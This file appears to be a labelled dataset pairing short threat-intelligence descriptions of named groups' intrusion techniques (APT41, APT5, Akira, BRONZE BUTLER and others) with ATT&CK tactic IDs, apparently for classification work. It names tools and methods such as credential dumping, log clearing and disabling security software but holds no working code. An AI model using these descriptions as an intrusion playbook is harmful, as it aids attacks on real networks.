APT41 uses multiple built-in commands such as systeminfo and `net config Workstation` to enumerate victim system basic configuration information.,['TA0007:Discovery']
APT41 collected MAC addresses from victim machines.,['TA0007:Discovery']
"APT41 has enumerated IP addresses of network resources and used the netstat command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.",['TA0007:Discovery']
"APT41 has executed whoami commands, including using the WMIEXEC utility to execute this on remote machines.",['TA0007:Discovery']
"APT41 has obtained and used tools such as Mimikatz, pwdump, PowerSploit, and Windows Credential Editor.",['TA0042:Resource Development']
APT41 used Linux shell commands for system survey and information gathering prior to exploitation of vulnerabilities such as CVE-2019-19871.,['TA0002:Execution']
APT41 used compromised credentials to log on to other systems.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"APT41 used the Acunetix SQL injection vulnerability scanner in target reconnaissance operations, as well as the JexBoss tool to identify vulnerabilities in Java applications.",['TA0043:Reconnaissance']
APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.,['TA0011:Command and Control']
APT41 used cmd.exe /c to execute commands on remote machines. APT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.,['TA0002:Execution']
"APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit. APT41 has executed files through Windows Management Instrumentation .",['TA0002:Execution']
APT41 modified legitimate Windows services to install malware backdoors. APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT41 leverages various tools and frameworks to brute-force directories on web servers.,['TA0043:Reconnaissance']
APT5 has created their own accounts with Local Administrator privileges to maintain access to systems with short-cycle credential rotation.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT5 has used the JAR/ZIP file format for exfiltrated files.,['TA0009:Collection']
APT5 has cleared the command history on targeted ESXi servers.,['TA0005:Defense Evasion']
APT5 has accessed Microsoft M365 cloud environments using stolen credentials.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT5 has modified legitimate binaries and scripts for Pulse Secure VPNs including the legitimate DSUpgrade.pm file to install the ATRIUM webshell for persistence.,['TA0003:Persistence']
APT5 has made modifications to the crontab file including in `/var/cron/tabs/`.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT5 has used legitimate account credentials to move laterally through compromised environments.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT5 has exploited vulnerabilities in externally facing software and devices including Pulse Secure VPNs and Citrix Application Delivery Controllers.,['TA0001:Initial Access']
APT5 has deleted scripts and web shells to evade detection.,['TA0005:Defense Evasion']
"APT5 has used the BLOODMINE utility to discover files with .css, .jpg, .png, .gif, .ico, .js, and .jsp extensions in Pulse Secure Connect logs.",['TA0007:Discovery']
APT5 has used the CLEANPULSE utility to insert command line strings into a targeted process to prevent certain log events from occurring.,['TA0005:Defense Evasion']
APT5 has used the THINBLOOD utility to clear SSL VPN log files located at `/home/runtime/logs`.,['TA0005:Defense Evasion']
APT5 has used malware with keylogging capabilities to monitor the communications of targeted entities.,"['TA0009:Collection', 'TA0006:Credential Access']"
APT5 has used the Task Manager process to target LSASS process memory in order to obtain NTLM password hashes. APT5 has also dumped clear text passwords and hashes from memory using Mimikatz hosted through an RDP mapped drive.,['TA0006:Credential Access']
APT5 has created Local Administrator accounts to maintain access to systems with short-cycle credential rotation.,['TA0003:Persistence']
APT5 has staged data on compromised systems prior to exfiltration often in `C:\Users\Public`.,['TA0009:Collection']
APT5 has used the BLOODMINE utility to parse and extract information from Pulse Secure Connect logs.,['TA0007:Discovery']
APT5 has named exfiltration archives to mimic Windows Updates at times using filenames with a `KB.zip` pattern.,['TA0005:Defense Evasion']
APT5 has used PowerShell to accomplish tasks within targeted environments.,['TA0002:Execution']
APT5 has used Windows-based utilities to carry out tasks including tasklist.exe.,['TA0007:Discovery']
APT5 has used the CLEANPULSE utility to insert command line strings into a targeted process to alter its functionality.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
APT5 has moved laterally throughout victim environments using RDP.,['TA0008:Lateral Movement']
APT5 has used SSH for lateral movement in compromised environments including for enabling access to ESXi host servers.,['TA0008:Lateral Movement']
APT5 has copied and exfiltrated the SAM Registry hive from targeted systems.,['TA0006:Credential Access']
APT5 has used the BLOODMINE utility to collect data on web requests from Pulse Secure Connect logs.,['TA0007:Discovery']
APT5 has modified file timestamps.,['TA0005:Defense Evasion']
APT5 has installed multiple web shells on compromised servers including on Pulse Secure VPN appliances.,['TA0003:Persistence']
APT5 has used cmd.exe for execution on compromised systems.,['TA0002:Execution']
"Agrius typically uses commercial VPN services for anonymizing last-hop traffic to victim networks, such as ProtonVPN.",['TA0042:Resource Development']
Agrius used 7zip to archive extracted data in preparation for exfiltration.,['TA0009:Collection']
"Agrius used a custom tool, sql.net4.exe, to query SQL databases and then identify and extract personally identifiable information.",['TA0009:Collection']
Agrius engaged in various brute forcing activities via SMB in victim environments.,['TA0006:Credential Access']
"Agrius gathered data from database and other critical servers in victim environments, then used wiping mechanisms as an anti-analysis and anti-forensics mechanism.",['TA0009:Collection']
Agrius has deployed base64-encoded variants of ASPXSpy to evade detection.,['TA0005:Defense Evasion']
"Agrius used several mechanisms to try to disable security tools. Agrius attempted to modify EDR-related services to disable auto-start on system reboot. Agrius used a publicly available driver, GMER64.sys typically used for anti-rootkit functionality, to selectively stop and remove security software processes.",['TA0005:Defense Evasion']
Agrius attempted to acquire valid credentials for victim environments through various means to enable follow-on lateral movement.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers.",['TA0010:Exfiltration']
Agrius exploits public-facing applications for initial access to victim environments. Examples include widespread attempts to exploit CVE-2018-13379 in FortiOS devices and SQL injection activity.,['TA0001:Initial Access']
Agrius used tools such as Mimikatz to dump LSASS memory to capture credentials in victim environments.,['TA0006:Credential Access']
Agrius downloaded some payloads for follow-on execution from legitimate filesharing services such as ufile.io and easyupload.io.,['TA0008:Lateral Movement']
"Agrius has used the folder, C:\\windows\\temp\\s\\, to stage data for exfiltration.",['TA0009:Collection']
"Agrius used the Plink tool for tunneling and connections to remote machines, renaming it systems.exe in some instances.",['TA0005:Defense Evasion']
Agrius used the open-source port scanner WinEggDrop to perform detailed scans of hosts of interest in victim networks.,['TA0007:Discovery']
Agrius engaged in password spraying via SMB in victim environments.,['TA0006:Credential Access']
Agrius tunnels RDP traffic through deployed web shells to access victim environments via compromised accounts. Agrius used the Plink tool to tunnel RDP connections for remote access and lateral movement in victim environments.,['TA0008:Lateral Movement']
"Agrius used the tool NBTscan to scan for remote, accessible hosts in victim environments.",['TA0007:Discovery']
Agrius dumped the SAM file on victim machines to capture credentials.,['TA0006:Credential Access']
Agrius typically deploys a variant of the ASPXSpy web shell following initial access via exploitation.,['TA0003:Persistence']
Agrius uses ASPXSpy web shells to enable follow-on command execution via cmd.exe.,['TA0002:Execution']
Agrius has deployed IPsec Helper malware post-exploitation and registered it as a service for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Ajax Security Team has used FireMalv custom-developed malware, which collected passwords from the Firefox browser storage.",['TA0006:Credential Access']
"Ajax Security Team has used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system.",['TA0011:Command and Control']
"Ajax Security Team has used CWoolger and MPK, custom-developed malware, which recorded all keystrokes on an infected system.","['TA0009:Collection', 'TA0006:Credential Access']"
Ajax Security Team has lured victims into executing malicious files.,['TA0002:Execution']
Ajax Security Team has used personalized spearphishing attachments.,['TA0001:Initial Access']
Ajax Security Team has used various social media channels to spearphish victims.,['TA0001:Initial Access']
Akira deletes administrator accounts in victim networks prior to encryption.,['TA0040:Impact']
Akira uses utilities such as WinRAR to archive data prior to exfiltration.,['TA0009:Collection']
Akira encrypts files in victim environments as part of ransomware operations.,['TA0040:Impact']
Akira uses the built-in Nltest utility or tools such as AdFind to enumerate Active Directory trusts in victim environments.,['TA0007:Discovery']
Akira will exfiltrate victim data using applications such as Rclone.,['TA0010:Exfiltration']
Akira uses compromised VPN accounts for initial access to victim networks.,"['TA0001:Initial Access', 'TA0003:Persistence']"
"Akira engages in double-extortion ransomware, exfiltrating files then encrypting them, in order to prompt victims to pay a ransom.",['TA0040:Impact']
Akira uses legitimate utilities such as AnyDesk and PuTTy for maintaining remote access to victim environments.,['TA0011:Command and Control']
Akira uses software such as Advanced IP Scanner and MASSCAN to identify remote hosts within victim networks.,['TA0007:Discovery']
Akira has accessed and downloaded information stored in SharePoint instances as part of data gathering and exfiltration activity.,['TA0009:Collection']
"Akira uses valid account information to remotely access victim networks, such as VPN credentials.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Andariel has collected large numbers of files from compromised network systems for later extraction.,['TA0009:Collection']
"Andariel has used watering hole attacks, often with zero-day exploits, to gain initial access to victims within a specific IP range.",['TA0001:Initial Access']
"Andariel has exploited numerous ActiveX vulnerabilities, including zero-days.",['TA0002:Execution']
Andariel has limited its watering hole attacks to specific IP address ranges.,['TA0043:Reconnaissance']
Andariel has downloaded additional tools and malware onto compromised hosts.,['TA0011:Command and Control']
Andariel has attempted to lure victims into enabling malicious macros within email attachments.,['TA0002:Execution']
Andariel has used a variety of publicly-available remote access Trojans for its operations.,['TA0042:Resource Development']
Andariel has used tasklist to enumerate processes and find a specific string.,['TA0007:Discovery']
"Andariel has inserted a malicious script within compromised websites to collect potential victim information such as browser type, system language, Flash Player version, and other data.",['TA0043:Reconnaissance']
Andariel has conducted spearphishing campaigns that included malicious Word or Excel attachments.,['TA0001:Initial Access']
Andariel has hidden malicious executables within PNG files.,['TA0005:Defense Evasion']
Andariel has used the netstat -naop tcp command to display TCP connections on a victim's machine.,['TA0007:Discovery']
Aoqin Dragon has exploited CVE-2012-0158 and CVE-2010-3333 for execution against targeted systems.,['TA0002:Execution']
Aoqin Dragon has run scripts to identify file formats including Microsoft Word.,['TA0007:Discovery']
Aoqin Dragon has spread malware in target networks by copying modules to folders masquerading as removable devices.,['TA0008:Lateral Movement']
"Aoqin Dragon has lured victims into opening weaponized documents, fake external drives, and fake antivirus to execute malicious payloads.",['TA0002:Execution']
"Aoqin Dragon has used custom malware, including Mongall and Heyoka Backdoor, in their operations.",['TA0042:Resource Development']
Aoqin Dragon has used fake icons including antivirus and external drives to disguise malicious payloads.,['TA0005:Defense Evasion']
Aoqin Dragon has used a dropper that employs a worm infection strategy using a removable device to breach a secure network environment.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
Aoqin Dragon has used the Themida packer to obfuscate malicious payloads.,['TA0005:Defense Evasion']
Aoqin Dragon obtained the Heyoka open source exfiltration tool and subsequently modified it for their operations.,['TA0042:Resource Development']
Aquatic Panda used the last command in Linux environments to identify recently logged-in users on victim machines.,['TA0007:Discovery']
"Aquatic Panda has used several publicly available tools, including WinRAR and 7zip, to compress collected files and memory dumps prior to exfiltration.",['TA0009:Collection']
Aquatic Panda cleared command history in Linux environments to remove traces of activity after operations.,['TA0005:Defense Evasion']
Aquatic Panda clears Windows Event Logs following activity to evade defenses.,['TA0005:Defense Evasion']
Aquatic Panda has encoded PowerShell commands in Base64.,['TA0005:Defense Evasion']
"Aquatic Panda has used DLL search-order hijacking to load `exe`, `dll`, and `dat` files into memory. Aquatic Panda loaded a malicious DLL into the legitimate Windows Security Health Service executable to execute malicious code on victim systems.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Aquatic Panda captured local Windows security event log data from victim machines using the wevtutil utility to extract contents to an evtx output file.,['TA0009:Collection']
Aquatic Panda has attempted to stop endpoint detection and response tools on compromised systems.,['TA0005:Defense Evasion']
Aquatic Panda used multiple mechanisms to capture valid user accounts for victim domains to enable lateral movement and access to additional hosts in victim environments.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Aquatic Panda modified the ld.so preload file in Linux environments to enable persistence for Winnti malware.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Aquatic Panda has deleted malicious executables from compromised machines.,['TA0005:Defense Evasion']
Aquatic Panda has downloaded additional malware onto compromised hosts.,['TA0011:Command and Control']
Aquatic Panda has attempted to harvest credentials through LSASS memory dumping.,['TA0006:Credential Access']
Aquatic Panda enumerated logs related to authentication in Linux environments prior to deleting selective entries for defense evasion purposes.,['TA0007:Discovery']
Aquatic Panda has acquired and used njRAT in its operations.,['TA0042:Resource Development']
"Aquatic Panda created new, malicious services using names such as Windows User Service to attempt to blend in with legitimate items on victim systems.",['TA0005:Defense Evasion']
Aquatic Panda renamed or moved malicious binaries to legitimate locations to evade defenses and blend into victim environments.,['TA0005:Defense Evasion']
"Aquatic Panda modified the victim registry to enable the `RestrictedAdmin` mode feature, allowing for pass the hash behaviors to function via RDP.",['TA0005:Defense Evasion']
"Aquatic Panda used a registry edit to enable a Windows feature called RestrictedAdmin in victim environments. This change allowed Aquatic Panda to leverage ""pass the hash"" mechanisms as the alteration allows for RDP connections with a valid account name and hash only, without possessing a cleartext password value.","['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
Aquatic Panda has downloaded additional scripts and executed Base64 encoded commands in PowerShell.,['TA0002:Execution']
Aquatic Panda leveraged stolen credentials to move laterally via RDP in victim environments.,['TA0008:Lateral Movement']
Aquatic Panda used remote scheduled tasks to install malicious software on victim systems during lateral movement actions.,['TA0008:Lateral Movement']
Aquatic Panda used rundll32.exe to proxy execution of a malicious DLL file identified as a keylogging binary.,['TA0005:Defense Evasion']
Aquatic Panda used remote shares to enable lateral movement in victim environments.,['TA0008:Lateral Movement']
Aquatic Panda used SSH with captured user credentials to move laterally in victim environments.,['TA0008:Lateral Movement']
Aquatic Panda has attempted to discover third party endpoint detection and response tools on compromised systems.,['TA0007:Discovery']
Aquatic Panda has used native OS commands to understand privilege levels and system details.,['TA0007:Discovery']
Aquatic Panda gathers information on recently logged-in users on victim devices.,['TA0007:Discovery']
Aquatic Panda has attempted to discover services for third party EDR products.,['TA0007:Discovery']
Aquatic Panda has acquired and used Cobalt Strike in its operations.,['TA0042:Resource Development']
Aquatic Panda used malicious shell scripts in Linux environments following access via SSH to install Linux versions of Winnti malware.,['TA0002:Execution']
Aquatic Panda has used publicly accessible DNS logging services to identify servers vulnerable to Log4j .,['TA0043:Reconnaissance']
Aquatic Panda has attempted and failed to run Bash commands on a Windows host by passing them to cmd /C.,['TA0002:Execution']
Aquatic Panda used WMI for lateral movement in victim environments.,['TA0002:Execution']
Aquatic Panda created new Windows services for persistence that masqueraded as legitimate Windows services via name change.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Axiom actors have been known to use the Sticky Keys replacement within RDP sessions to obtain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Axiom has compressed and encrypted data prior to exfiltration.,['TA0009:Collection']
Axiom has used large groups of compromised machines for use as proxy nodes.,['TA0042:Resource Development']
Axiom has acquired dynamic DNS services for use in the targeting of intended victims.,['TA0042:Resource Development']
Axiom has collected data from a compromised network.,['TA0009:Collection']
Axiom has used watering hole attacks to gain access.,['TA0001:Initial Access']
Axiom has been observed using SQL injection to gain access to systems.,['TA0001:Initial Access']
"Axiom has used exploits for multiple vulnerabilities including CVE-2014-0322, CVE-2012-4792, CVE-2012-1889, and CVE-2013-3893.",['TA0002:Execution']
Axiom has been known to dump credentials.,['TA0006:Credential Access']
Axiom has used spear phishing to initially compromise victims.,['TA0001:Initial Access']
Axiom has targeted victims with remote administration tools including RDP.,['TA0008:Lateral Movement']
Axiom has used RDP during operations.,['TA0008:Lateral Movement']
Axiom has used steganography to hide its C2 communications.,['TA0011:Command and Control']
Axiom has used digital certificates to deliver malware.,['TA0005:Defense Evasion']
Axiom has used previously compromised administrative accounts to escalate privileges.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Axiom has used VPS hosting providers in targeting of intended victims.,['TA0042:Resource Development']
BITTER has registered a variety of domains to host malicious payloads and for C2.,['TA0042:Resource Development']
BITTER has executed OLE objects using Microsoft Equation Editor to download and run malicious payloads.,['TA0002:Execution']
BITTER has used DDNS for C2 communications.,['TA0011:Command and Control']
BITTER has encrypted their C2 communications.,['TA0011:Command and Control']
BITTER has used a RAR SFX dropper to deliver malware.,['TA0005:Defense Evasion']
"BITTER has exploited Microsoft Office vulnerabilities CVE-2012-0158, CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802.",['TA0002:Execution']
BITTER has exploited CVE-2021-1732 for privilege escalation.,['TA0004:Privilege Escalation']
BITTER has downloaded additional malware and tools onto a compromised host.,['TA0011:Command and Control']
BITTER has attempted to lure victims into opening malicious attachments delivered via spearphishing.,['TA0002:Execution']
BITTER has disguised malware as a Windows Security update service.,['TA0005:Defense Evasion']
BITTER has used TCP for C2 communications.,['TA0011:Command and Control']
BITTER has used scheduled tasks for persistence and execution.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
BITTER has sent spearphishing emails with a malicious RTF document or Excel spreadsheet.,['TA0001:Initial Access']
BITTER has obtained tools such as PuTTY for use in their operations.,['TA0042:Resource Development']
BITTER has registered domains to stage payloads.,['TA0042:Resource Development']
BITTER has used HTTP POST requests for C2.,['TA0011:Command and Control']
BRONZE BUTLER has compressed data into password-protected RAR archives prior to exfiltration.,['TA0009:Collection']
BRONZE BUTLER has used at to register a scheduled task to execute malware during lateral movement.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"BRONZE BUTLER downloader code has included ""0"" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection.",['TA0005:Defense Evasion']
BRONZE BUTLER has used a Windows 10 specific tool and xxmm to bypass UAC for privilege escalation.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
BRONZE BUTLER has used legitimate applications to side-load malicious DLLs.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
BRONZE BUTLER has exfiltrated files stolen from local systems.,['TA0009:Collection']
BRONZE BUTLER has exfiltrated files stolen from file shares.,['TA0009:Collection']
BRONZE BUTLER's MSGET downloader uses a dead drop resolver to access malicious payloads.,['TA0011:Command and Control']
BRONZE BUTLER downloads encoded payloads and decodes them on the victim.,['TA0005:Defense Evasion']
BRONZE BUTLER has incorporated code into several tools that attempts to terminate anti-virus processes.,['TA0005:Defense Evasion']
BRONZE BUTLER has used net user /domain to identify account information.,['TA0007:Discovery']
BRONZE BUTLER compromised three Japanese websites using a Flash exploit to perform watering hole attacks.,['TA0001:Initial Access']
"BRONZE BUTLER has exploited Microsoft Office vulnerabilities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution.",['TA0002:Execution']
The BRONZE BUTLER uploader or malware the uploader uses command to delete the RAR archives after they have been exfiltrated.,['TA0005:Defense Evasion']
"BRONZE BUTLER has collected a list of files from the victim and uploaded it to its C2 server, and then created a new list of specific files to steal.",['TA0007:Discovery']
"BRONZE BUTLER has used various tools to download files, including DGet .",['TA0011:Command and Control']
BRONZE BUTLER has used various tools to perform credential dumping.,['TA0006:Credential Access']
BRONZE BUTLER has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails.,['TA0002:Execution']
BRONZE BUTLER has masked executables with document file icons including Word and Adobe PDF.,['TA0005:Defense Evasion']
BRONZE BUTLER has given malware the same name as an existing file on the file share server to cause users to unwittingly launch and install the malware on additional systems.,['TA0005:Defense Evasion']
BRONZE BUTLER has created forged Kerberos Ticket Granting Ticket and Ticket Granting Service tickets to maintain administrative access.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
BRONZE BUTLER has used PowerShell for execution.,['TA0002:Execution']
BRONZE BUTLER has made use of Python-based remote access tools.,['TA0002:Execution']
BRONZE BUTLER has used a batch script that adds a Registry Run key to establish malware persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
BRONZE BUTLER typically use ping and Net to enumerate systems.,['TA0007:Discovery']
BRONZE BUTLER has used Right-to-Left Override to deceive victims into executing several strains of malware.,['TA0005:Defense Evasion']
BRONZE BUTLER has used schtasks to register a scheduled task to execute malware during lateral movement.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
BRONZE BUTLER has used a tool to capture screenshots.,['TA0009:Collection']
BRONZE BUTLER has used tools to enumerate software installed on an infected host.,['TA0007:Discovery']
BRONZE BUTLER used spearphishing emails with malicious Microsoft Word attachments to infect victims.,['TA0001:Initial Access']
Several BRONZE BUTLER tools encode data with base64 when posting it to a C2 server.,['TA0011:Command and Control']
BRONZE BUTLER has used steganography in multiple operations to conceal malicious payloads.,['TA0005:Defense Evasion']
BRONZE BUTLER has used RC4 encryption and AES to obfuscate HTTP traffic. BRONZE BUTLER has also used a tool called RarStar that encodes data with a custom XOR algorithm when posting it to a C2 server.,['TA0011:Command and Control']
BRONZE BUTLER has used TROJ_GETVERSION to discover system services.,['TA0007:Discovery']
BRONZE BUTLER has used net time to check the local time on a target system.,['TA0007:Discovery']
BRONZE BUTLER has placed malware on file shares and given it the same name as legitimate documents on the share.,['TA0008:Lateral Movement']
"BRONZE BUTLER has obtained and used open-source tools such as Mimikatz, gsecdump, and Windows Credential Editor.",['TA0042:Resource Development']
BRONZE BUTLER has used VBS and VBE scripts for execution.,['TA0002:Execution']
BRONZE BUTLER malware has used HTTP for C2.,['TA0011:Command and Control']
BRONZE BUTLER has used batch scripts and the command-line interface for execution.,['TA0002:Execution']
BackdoorDiplomacy has executed DLL search order hijacking.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
BackdoorDiplomacy has dropped legitimate software onto a compromised host and used it to execute malicious DLLs.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"BackdoorDiplomacy has exploited CVE-2020-5902, an F5 BIP-IP vulnerability, to drop a Linux backdoor. BackdoorDiplomacy has also exploited mis-configured Plesk servers.",['TA0001:Initial Access']
BackdoorDiplomacy has downloaded additional files and tools onto a compromised host.,['TA0011:Command and Control']
BackdoorDiplomacy has copied files of interest to the main drive's recycle bin.,['TA0009:Collection']
"BackdoorDiplomacy has obtained and used leaked malware, including DoublePulsar, EternalBlue, EternalRocks, and EternalSynergy, in its operations.",['TA0042:Resource Development']
BackdoorDiplomacy has disguised their backdoor droppers with naming conventions designed to blend into normal operations.,['TA0005:Defense Evasion']
BackdoorDiplomacy has dropped implants in folders named for legitimate software.,['TA0005:Defense Evasion']
"BackdoorDiplomacy has used SMBTouch, a vulnerability scanner, to determine whether a target is vulnerable to EternalBlue malware.",['TA0007:Discovery']
BackdoorDiplomacy has used EarthWorm for network tunneling with a SOCKS5 server and port transfer functionalities.,['TA0011:Command and Control']
BackdoorDiplomacy has obfuscated tools and malware it uses with VMProtect.,['TA0005:Defense Evasion']
"BackdoorDiplomacy has used an executable to detect removable media, such as USB flash drives.",['TA0007:Discovery']
BackdoorDiplomacy has used NetCat and PortQry to enumerate network connections and display the status of related TCP and UDP ports.,['TA0007:Discovery']
BackdoorDiplomacy has obtained a variety of open-source reconnaissance and red team tools for discovery and lateral movement.,['TA0042:Resource Development']
BackdoorDiplomacy has used web shells to establish an initial foothold and for lateral movement within a victim's system.,['TA0003:Persistence']
BlackOasis's first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools.,['TA0005:Defense Evasion']
BlackTech has used stolen code-signing certificates for its malicious payloads.,['TA0042:Resource Development']
BlackTech has used DLL side loading by giving DLLs hardcoded names and placing them in searched directories.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"BlackTech has used valid, stolen digital certificates for some of their malware and tools.",['TA0042:Resource Development']
"BlackTech has exploited a buffer overflow vulnerability in Microsoft Internet Information Services 6.0, CVE-2017-7269, in order to establish a new HTTP or command and control server.",['TA0001:Initial Access']
"BlackTech has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities CVE-2012-0158, CVE-2014-6352, CVE-2017-0199, and Adobe Flash CVE-2015-5119.",['TA0002:Execution']
BlackTech has used e-mails with malicious documents to lure victims into installing malware.,['TA0002:Execution']
BlackTech has used e-mails with malicious links to lure victims into installing malware.,['TA0002:Execution']
BlackTech has used built-in API functions.,['TA0002:Execution']
BlackTech has used the SNScan tool to find other potential targets on victim networks.,['TA0007:Discovery']
BlackTech has used right-to-left-override to obfuscate the filenames of malicious e-mail attachments.,['TA0005:Defense Evasion']
BlackTech has used Putty for remote access.,['TA0008:Lateral Movement']
BlackTech has used spearphishing e-mails with malicious password-protected archived files to deliver malware.,['TA0001:Initial Access']
BlackTech has used spearphishing e-mails with links to cloud services to deliver malware.,['TA0001:Initial Access']
"BlackTech has obtained and used tools such as Putty, SNScan, and PsExec for its operations.",['TA0042:Resource Development']
Blue Mockingbird has used JuicyPotato to abuse the SeImpersonate token privilege to escalate from web application pool accounts to NT Authority\SYSTEM.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Blue Mockingbird has used wmic.exe and Windows Registry modifications to set the COR_PROFILER environment variable to execute a malicious DLL whenever a process loads the .NET CLR.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Blue Mockingbird has used XMRIG to mine cryptocurrency on victim systems.,['TA0040:Impact']
Blue Mockingbird has obfuscated the wallet address in the payload binary.,['TA0005:Defense Evasion']
"Blue Mockingbird has gained initial access by exploiting CVE-2019-18935, a vulnerability within Telerik UI for ASP.NET AJAX.",['TA0001:Initial Access']
Blue Mockingbird has used Mimikatz to retrieve credentials from LSASS memory.,['TA0006:Credential Access']
Blue Mockingbird has masqueraded their XMRIG payload name by naming it wercplsupporte.dll after the legitimate wercplsupport.dll file.,['TA0005:Defense Evasion']
Blue Mockingbird has used Windows Registry modifications to specify a DLL payload.,['TA0005:Defense Evasion']
Blue Mockingbird has used PowerShell reverse TCP shells to issue interactive commands over a network connection.,['TA0002:Execution']
"Blue Mockingbird has used FRP, ssf, and Venom to establish SOCKS proxy connections.",['TA0011:Command and Control']
Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using regsvr32.exe.,['TA0005:Defense Evasion']
Blue Mockingbird has used Remote Desktop to log on to servers interactively and manually copy files to remote hosts.,['TA0008:Lateral Movement']
Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using rundll32.exe.,['TA0005:Defense Evasion']
Blue Mockingbird has used Windows Explorer to manually copy malicious files to remote hosts over SMB.,['TA0008:Lateral Movement']
Blue Mockingbird has used Windows Scheduled Tasks to establish persistence on local and remote hosts.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Blue Mockingbird has executed custom-compiled XMRIG miner DLLs by configuring them to execute via the ""wercplsupport"" service.",['TA0002:Execution']
"Blue Mockingbird has collected hardware details for the victim's system, including CPU and memory information.",['TA0007:Discovery']
Blue Mockingbird has obtained and used tools such as Mimikatz.,['TA0042:Resource Development']
Blue Mockingbird has used batch script files to automate execution and deployment of payloads.,['TA0002:Execution']
Blue Mockingbird has used wmic.exe to set environment variables.,['TA0002:Execution']
Blue Mockingbird has used mofcomp.exe to establish WMI Event Subscription persistence mechanisms configured from a *.mof file.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Blue Mockingbird has made their XMRIG payloads persistent as a Windows Service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
CURIUM has exfiltrated data from a compromised machine.,['TA0009:Collection']
CURIUM created domains to facilitate strategic website compromise and credential capture activities.,['TA0042:Resource Development']
CURIUM has used strategic website compromise to infect victims with malware such as IMAPLoader.,['TA0001:Initial Access']
CURIUM used strategic website compromise to fingerprint then target victims.,['TA0042:Resource Development']
CURIUM has created dedicated email accounts for use with tools such as IMAPLoader.,['TA0042:Resource Development']
CURIUM has used SMTPS to exfiltrate collected data from victims.,['TA0010:Exfiltration']
CURIUM has used IMAP and SMTPS for exfiltration via tools such as IMAPLoader.,['TA0010:Exfiltration']
CURIUM has lured users into opening malicious files delivered via social media.,['TA0002:Execution']
CURIUM has leveraged PowerShell scripts for initial process execution and data gathering in victim environments.,['TA0002:Execution']
CURIUM has created dedicated servers for command and control and exfiltration purposes.,['TA0042:Resource Development']
"CURIUM has established a network of fictitious social media accounts, including on Facebook and LinkedIn, to establish relationships with victims, often posing as an attractive woman.",['TA0042:Resource Development']
CURIUM has used phishing with malicious attachments for initial access to victim environments.,['TA0001:Initial Access']
CURIUM used malicious links to adversary-controlled resources for credential harvesting.,['TA0043:Reconnaissance']
CURIUM has used social media to deliver malicious files to victims.,['TA0001:Initial Access']
"CURIUM deploys information gathering tools focused on capturing IP configuration, running application, system information, and network connectivity information.",['TA0007:Discovery']
CURIUM deployed mechanisms to check system time information following strategic website compromise attacks.,['TA0007:Discovery']
CURIUM created virtual private server instances to facilitate use of malicious domains and other items.,['TA0042:Resource Development']
CURIUM has compromised legitimate websites to enable strategic website compromise attacks.,['TA0042:Resource Development']
CURIUM has been linked to web shells following likely server compromise as an initial access vector into victim networks.,['TA0003:Persistence']
"Carbanak has used a VBScript named ""ggldr"" that uses Google Apps Script, Sheets, and Forms services for C2.",['TA0011:Command and Control']
Carbanak may use netsh to add local firewall rule exceptions.,['TA0005:Defense Evasion']
Carbanak has copied legitimate service names to use for malicious services.,['TA0005:Defense Evasion']
"Carbanak has named malware ""svchost.exe,"" which is the name of the Windows shared service host program.",['TA0005:Defense Evasion']
